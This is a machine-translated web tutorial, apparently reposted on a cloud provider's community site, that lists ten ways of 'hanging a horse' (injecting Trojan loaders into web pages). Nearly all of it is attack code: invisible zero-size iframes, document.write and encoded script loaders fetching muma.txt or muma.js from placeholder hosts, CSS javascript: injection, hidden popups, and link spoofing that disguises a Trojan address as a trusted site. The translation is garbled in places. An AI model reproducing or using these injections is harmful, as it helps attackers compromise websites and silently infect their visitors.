The way of _javascript and detailed introduction of the technique of the Web page hanging horse

Source: Internet
Author: User

Way to hang a horse

One: Frame hanging horse

   <iframe src= Address width=0 height=0></iframe>

Two: JS file hanging Horse

First, the following code

document.write ("<iframe width= ' 0 ' height= ' 0 ' src= ' address ' ></iframe>");

Save As Xxx.js,

Then JS hanging Horse code for

 <script Language=javascript src=xxx.js></script>

Three: JS deformation encryption

 <script language= "Jscript.encode" src=http://www.xxx.com/muma.txt></script>

Muma.txt can be changed to any suffix

Four: The body hangs the horse

<body onload= "window.location= ' address"; ></body>

Five: Concealed Hanging horse

 Top.document.body.innerHTML = Top.document.body.innerHTML + ' \r\n<iframe src= ';

Six: the horse hanging in CSS

 Body {
Background-image:url (' Javascript:document.write ("<script src=http://www.xxx.net/muma.js></script>")}

Seven: JS hanging horse

<script language=javascript> 
window.open ("Address", "" "," Toolbar=no,location=no,directories=no,status=no,  Menubar=no,scro llbars=no,width=1,height=1 "); 
</script>

Eight: Picture camouflage

 
 

Nine: Camouflage Call:

<frameset rows= "444,0" cols= "*" >
<frame src= "open Web page" framborder= "no" scrolling= "Auto" noresize = "0" margingheight= "0" >
<frame src= "net ma address" frameborder= "no" scrolling= "no" noresize marginwidth= "0" margingheight= "0" >
</frameset>

Ten: Advanced Deception

<a href= "http://www.163.com (confuse connection address, show this address point to Trojan address)" onmouseover= "www_163_com (); return true; " > page to display </a>
<script language= "JavaScript" >
function www_163_com ()
{
var url=  NET horse address ";
Open (URL, "NewWindow", "Toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no," Copyhistory=yes,width=800,height=600,left=10,top=10 ");
}
</SCRIPT>

Thank you for reading, I hope to help you, thank you for your support for this site!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.